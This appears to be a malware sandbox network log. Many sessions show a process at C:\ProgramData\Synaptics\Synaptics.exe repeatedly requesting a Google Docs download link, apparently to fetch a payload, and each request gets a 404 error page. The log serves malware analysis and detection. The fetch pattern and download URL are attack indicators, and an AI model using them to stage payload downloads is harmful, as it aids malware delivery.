                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:32 UTC76INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:32 UTC76INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 7a 77 4d 6f 6e 70 57 72 30 4f 31 78 78 41 63 6f 35 64 53 52 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mzwMonpWr0O1xxAco5dSRQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:32 UTC77INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:32 UTC78INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        240192.168.2.350020142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:01 UTC726OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:01 UTC727INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:01 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-cQCKWV8K8rMpLavucSvKiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:01 UTC728INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 57 66 76 72 70 4e 36 4a 4d 43 5a 6e 45 52 35 35 62 31 7a 68 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VWfvrpN6JMCZnER55b1zhw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:01 UTC730INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:01 UTC730INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        241192.168.2.350021142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:01 UTC727OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:01 UTC730INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:01 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-0V4J5p7U/9nySrQCNzTqgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:01 UTC731INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 30 66 76 70 75 56 46 53 6e 54 2b 73 49 51 30 4a 6f 2f 47 50 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="V0fvpuVFSnT+sIQ0Jo/GPw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:01 UTC733INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:01 UTC733INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        242192.168.2.350022142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:01 UTC730OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:01 UTC733INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:01 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VkMsJOUnp0EitrUZ/0H+xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:01 UTC734INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:01 UTC734INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 44 32 65 5a 73 59 78 53 61 42 6e 73 70 46 34 73 61 76 74 6c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WD2eZsYxSaBnspF4savtlw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:01 UTC736INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:01 UTC736INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        243192.168.2.350023142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:01 UTC736OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:01 UTC736INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:01 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-1G+4Nc4uJEIrSYG+hfBrMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:01 UTC738INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 50 45 79 75 43 78 79 47 7a 73 71 76 36 4d 35 36 2f 2f 45 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="APEyuCxyGzsqv6M56//Efg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:01 UTC739INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:01 UTC739INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        244192.168.2.350024142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:01 UTC736OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:02 UTC739INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:01 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9QYfSpCtgZ1GxeVxHqC8Og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:02 UTC741INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
